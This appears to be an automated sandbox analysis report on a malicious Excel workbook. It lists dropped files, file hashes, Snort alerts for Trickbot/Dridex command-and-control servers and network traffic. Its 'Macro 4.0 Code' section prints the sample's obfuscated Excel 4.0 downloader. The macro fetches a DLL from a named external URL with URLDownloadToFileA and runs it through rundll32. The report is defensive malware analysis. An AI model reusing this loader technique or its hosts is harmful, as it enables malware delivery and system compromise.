                                                                                                                                                                  SHA-512:E5BEAD707ABAAA6767C0D73F6EE2BCB399EB2222075593BAB4536CC9B414767E0752BBB4A6E9C903B50A94CA0B4E7E78016ED2A6DCF5C8E6A47E4D31E177E841
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: L..................F...........7G....a.o.....a.o.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TRtP..Desktop.d......QK.XTRtP*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813435..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 09:03:26 2021, mtime=Sat Feb 20 09:03:39 2021, atime=Sat Feb 20 09:03:39 2021, length=168448, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2368
                                                                                                                                                                  Entropy (8bit):4.5536921340652095
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:8A/XT0jzHCVUkHCPWQh2A/XT0jzHCVUkHCPWQ/:8A/XojziSPWQh2A/XojziSPWQ/
                                                                                                                                                                  MD5:12AA67A97716BCD6E2D369DA74FC45DF
                                                                                                                                                                  SHA1:CA72A5034F671012CAB366D7A46A0737675B6734
                                                                                                                                                                  SHA-256:1BD9B6C3424DD25A4C6D584BFB66F8893FE1487DF0900ADD1D566AEAA0C1E2A3
                                                                                                                                                                  SHA-512:02EC0FCA7DCA05A68074C58659A201F604E5D42C43838EE021DD31BC134392F254AA3986EE8B0E49DD12D41466130959F1C699A9A5215FDF764FD2F7B43A88AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: L..................F.... ....s`.o...e.Z.o.....a.o................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TRnP..Desktop.d......QK.XTRnP*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TRpP .SECURI~1.XLS.........TRnPTRnP*...7.....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.5.8.0.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.5.8.0.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):185
                                                                                                                                                                  Entropy (8bit):4.821642993109982
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:oyBVomM0bcsoMWcWLBCuscbcsoMWcWLBCmM0bcsoMWcWLBCv:dj60wsoMWcW7wsoMWcWU0wsoMWcWs
                                                                                                                                                                  MD5:9F284AB634504C93260EB63F1A414C3A
                                                                                                                                                                  SHA1:F03FCF9CFEF86F22C32E39BEAE0757D031E6F00B
                                                                                                                                                                  SHA-256:30BA18CCB301C5BFC2FE06B8C4C00381179BCFC3900071DC13384EAAF98DBF93
                                                                                                                                                                  SHA-512:FD820B08C40FB5D1D5C6EC04E26671F9C8435A000E63140B7F816255BC0DA41EB4839CEAA616C89608CB28A91C17446FB8E62A6AF471CD52E64F3BD7229ECA69
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK=0..
                                                                                                                                                                  C:\Users\user\AppData\Roaming\QNetMonitor7737977537\SecurityPreloadState.txt
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50552
                                                                                                                                                                  Entropy (8bit):4.708069223371663
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:0jF6YZaub2HlXceGFcgRAGXxCveTUNbViEOr+UGuBNwfMZS8cC9j:0jARuqFXceCc1GXgvuUlVi3r+sbwA1V
                                                                                                                                                                  MD5:F4B78BE0BEA55BBD3C7FA0BE346507A2
                                                                                                                                                                  SHA1:17FD2B667D6383D8ADA52246FB38A8ABD0952403
                                                                                                                                                                  SHA-256:D1B6216EE15B7657AF17F4BBED25FCF6DEA262241814362A441F7E8247BB2D34
                                                                                                                                                                  SHA-512:2501BCA8D80708A6D4C0F1B505B82432F7CDC98DFC9B08EF7FA5825FFFE7EEE1E6E5E2C3BE242626EC832277A0AC1EB185FD74EF283F2340D69888F62396E339
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: [uxhrbjl h]..vld qxtd=grpx jjn x bxjfn ulrxj bndh pjjxt x bzbjtp hvz djfzj m jffzj..xfffjxldnttp=vzjffbvf p nvb vr bl xprlh nbf bn p sr zbdjjb..vdlf=ivfx rflhdp zj zrdhhlz fjf p s vjzl x sd..wp jbfbj=ixf lplt fvnhp zv fp n zlzzb..mnbxvd=vvfzbrd xhzbz d xn rdth f wfr jd jjxtdn bz nxjjn e lvh fbnxhxdd bzj..vvrbl =jfd kvfbxln jvdt llz gdvzr lljfr xh vvtp jv nhr fzj jhnn bbft fz hht..sdpzjftbrn=fxltpdx hzbbfp dxhzbv..dhldbl wdnzf=oxx evn jdj bn xhpl xbn xldb x fjx lptrplx frfb czj y rtz vfpdp..hvbf p xhrfjrl=pdvzvl hxx o vjl vfbnxhd cfz j xh h j htjnv l nhtjnrbx lhtbrb lnz vfp mbv..fjrnvhx =frjv dpl dx idvz ntxxtdn zn d jfr mphfjb ndhl btxp wv vbpttxj rb..hrvzjp=ujx dxzpfz jtd h..avfzzl=bbnbnvll pbjjxh zr btxxbdv vz lt w i..s vbffbn=plbfzn ..vzlttxjd=hvj zzxnjvdp ptf id vzj m xtdnzn ppjfr i wxx tdnz zjtxp jv zlff..bwbdjtoos=s fcjzz fnpvd w wpdrxvaa qd n idk cj o isnn..a onlssobqysah=lhiqwe txop xr p wwe s ocjj njs wcjj fcrvpzuu q..fkq =unmxe bpd..hoxb pgklubxfa=cwjgmwr
                                                                                                                                                                  C:\Users\user\AppData\Roaming\QNetMonitor7737977537\cn\aexsxmcq.txt
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):832
                                                                                                                                                                  Entropy (8bit):7.70889643865104
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:Gj/ry+qniE6gRtX0tfgPWc+QB3maZau7qO3FcFp5Cx2mKTBbpiKD9gBYpjHT4XI:A/ryVniE8qBWSau7JFqp5otKltiZB+cY
                                                                                                                                                                  MD5:79820EBE9603E6EF3D482B96D982B39D
                                                                                                                                                                  SHA1:0FDBF234BDB19A1B4145EA97BFD764ED26F3B5B3
                                                                                                                                                                  SHA-256:E9E0CA9B1C1CA402B62F4AE5C5D98EDB1D2EB261A1DE3B11F2370D96EC9850D3
                                                                                                                                                                  SHA-512:308172E4C89001555B5F69ABB81A7089F393F20E5EA04CB5B89A11E77331C2060A8B919D50C9590FE17ED7DA56B03D86E19095D56F29DECB225D36651E61F0B8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: ..{..R.qG).F"...x..(...`$t.....K.m~.5........Y...*#..K..A....V+I=..J.....RL-@....hm.9Z..M.f.....1-O.Eg.=..&.u.r..2.....%...$kN=....X.r...C(J.4r&.-/...\..f.....(.......MP...:.k.....Q.M.:2....q._.V..P.[....h....._.1.......1..k..?..A....K$cEd......0|(..A.0..-|.@'....L..i@.....2........ut..Pm.d..c#.',..8. t.&.)s*...q....>&."Y....T&..R....&..y..<G..-.....d[JQ..............Q=K........].ou......8k....|{XX...x..x.......A..}!...M...<>..K/.....s.8.."$......y..~S.-.\%./. .7$.\...p.].-..'.Br...S1r.....=...hx..'.u...`C...Gr.L.PZ..&ak..w..|~.L&..}.&....k.7_..}O.2S....I".@.24.....7..!2......C.[...*..49.0X.OD9*..Kg...W.......xe1..6.\....m...8P..0$.G!.._tBG...?..'.X...0.m.i^DX...m...E]...h.T .U={..2A....~..V...`.K|..a^.7......P.L...$-.e..#.7..r_.y.. B.8V]..c..z.....j....'.6.....o|u=r...K.x
                                                                                                                                                                  C:\Users\user\AppData\Roaming\QNetMonitor7737977537\en-EN\pwgrab64
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1113968
                                                                                                                                                                  Entropy (8bit):7.999826561917907
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:24576:YQ1jA+zk2ngTUmbSildEgvZo1H5GG0u5Y4fKh4PODFRbl:YvmnfhilmP1MGrPfADPh
                                                                                                                                                                  MD5:4E3A8FE6D217EBC34D5F332F156862E7
                                                                                                                                                                  SHA1:D80C64AC318123E51E13D07198E254AF3E5205C9
                                                                                                                                                                  SHA-256:A1A50D2BB909AA82634C7FF5556CE816807105898A4EE211DA911CBA053A8E38
                                                                                                                                                                  SHA-512:F7910E467AA01B220BE757563E447F826BFAB858892EA3FF75305F80EDBD4AECDCC2226D2A60F2F9A60A8790C87D9BE83F9F56B585BD3DBA430B8BDB5B0F5A75
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: b.P....Jqcf..G\.B..W.....!.n....C..,.]nX.yb9...|D.d.o... ..r."..s.exb..m...eo....Z..v...5...H.=......x.`..{.~..a..&..f.j*......;=@>....sg...P..V....H,./2.*.T.l...i..<Ab:..S...s.:in....w....40[.B.3#...K.j........U..#l...t..s..fFT...w..B....:2...>..{...SX...s..e..}..1z.n...rd.a.~....Y.{.HD.`...UT./.s..........D...d..N........).pQ.u.....{|W.!....i..W....s.1..[.{@\5.<J;..B?5>\.g..Gc.............-..0.....c..]j&.m.}.]r....R...E..:.v.1t..5a#...,.L..A...........PD...[....z...A[.D....5.>.|L.|2...prp.{.X....sxJ$Rr..W.(.V...0.HZm..j`.......:....c..*-N.wl-...d0@..DlS.N..7^..Kp.C)...?_d......NCj.....w..n..{&|C..)..6/.L....DH.rsD..#..r.6.,X.`.....!.-e.e`....w......R!v0.8..."/...#.0.9..*.FA....i...O.p.^....p.knk.Z.=....Xv..N$s.!.[..C..(T,G7.....Q{.{.....9.Lq.U...._..jCB.:e.....d...4.#.. .j..m.......=..'...d.K4?%nl.E.xp..M..qe...]..i.yrB.A4....j$...R.sS...h'..$..W.]gw.r..w...@t.``....*3#-.....t..b..k.... ....[..Nb..-...<.+...;...........C.s..n.9..p..s.
                                                                                                                                                                  C:\Users\user\BASE.BABAA
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4591104
                                                                                                                                                                  Entropy (8bit):5.0540147937501265
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                  MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                  SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                  SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                  SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-707465831_1420670581.xls, Detection: malicious, Browse
                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\Desktop\D3DE0000
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):177025
                                                                                                                                                                  Entropy (8bit):7.239977180684175
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnX:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKz
                                                                                                                                                                  MD5:D2474C75CDE3227EA704388E3780FAD8
                                                                                                                                                                  SHA1:A9D5EC8A96C8EE9C32F57F8AC5B1174F1890E037
                                                                                                                                                                  SHA-256:B2D82C42D488536A1BA10607DACE28B53476527C336B7A1A79BEA90B449D2716
                                                                                                                                                                  SHA-512:39CC09DCA7667A608DC64F6D42F2B1B3EC9E11FF5AD3604D0034AE9BE7C7FB8B860CE91B74C96E964D0C527FB93194EB71671295B8FA363B69B60237CECB7F70
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                                                  Entropy (8bit):7.195176543915214
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                  File name:SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls
                                                                                                                                                                  File size:168960
                                                                                                                                                                  MD5:35ca616a3d685b7d1708eb901841879c
                                                                                                                                                                  SHA1:b5073681d9bc3885987ee74ec1325d96152c46f0
                                                                                                                                                                  SHA256:b9e1d6f26440468f142642382047529f94536f9601f4ffa70917c1b3ccac69e7
                                                                                                                                                                  SHA512:df7e00cb6d9558b65dbfda906eb5adc8d8a0f0a248d9d68ff93971e3021e3ccf756a544fda25f41189bff078966d3ab9c70660aa1dd7b295e1680dfc4cbec91f
                                                                                                                                                                  SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMz:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKO
                                                                                                                                                                  File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:e4eea286a4b4bcb4

                                                                                                                                                                  Static OLE Info

                                                                                                                                                                  General

                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                  OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls"

                                                                                                                                                                  Indicators

                                                                                                                                                                  Has Summary Info:True
                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                                  Summary

                                                                                                                                                                  Code Page:1251
                                                                                                                                                                  Author:
                                                                                                                                                                  Last Saved By:
                                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                                  Last Saved Time:2021-02-19 10:48:36
                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                  Security:0

                                                                                                                                                                  Document Summary

                                                                                                                                                                  Document Code Page:1251
                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                  Contains Dirty Links:False
                                                                                                                                                                  Shared Document:False
                                                                                                                                                                  Changed Hyperlinks:False
                                                                                                                                                                  Application Version:917504

                                                                                                                                                                  Streams

                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                  Entropy:0.357299206868
                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                  Entropy:0.247217286775
                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:Workbook
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                  Stream Size:157800
                                                                                                                                                                  Entropy:7.46869820242
                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                  Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                                  ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                                                  "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                  02/20/21-02:04:01.483457TCP2404348ET CNC Feodo Tracker Reported CnC Server TCP group 2549166443192.168.2.2294.140.114.136
                                                                                                                                                                  02/20/21-02:05:28.834629TCP2404320ET CNC Feodo Tracker Reported CnC Server TCP group 1149170443192.168.2.22193.8.194.96
                                                                                                                                                                  02/20/21-02:05:29.234872TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349170193.8.194.96192.168.2.22
                                                                                                                                                                  02/20/21-02:05:40.075193TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349173193.8.194.96192.168.2.22
                                                                                                                                                                  02/20/21-02:05:41.044052TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 849174447192.168.2.22185.109.54.99
                                                                                                                                                                  02/20/21-02:05:50.281523TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349175193.8.194.96192.168.2.22
                                                                                                                                                                  02/20/21-02:05:53.685562TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349177193.8.194.96192.168.2.22
                                                                                                                                                                  02/20/21-02:05:56.148684TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349178193.8.194.96192.168.2.22
                                                                                                                                                                  02/20/21-02:05:59.279274TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349179193.8.194.96192.168.2.22

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Feb 20, 2021 02:03:50.544589043 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.602483034 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.602758884 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.604053020 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.662072897 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.669842005 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.669876099 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.669924974 CET8049165185.81.0.78192.168.2.22
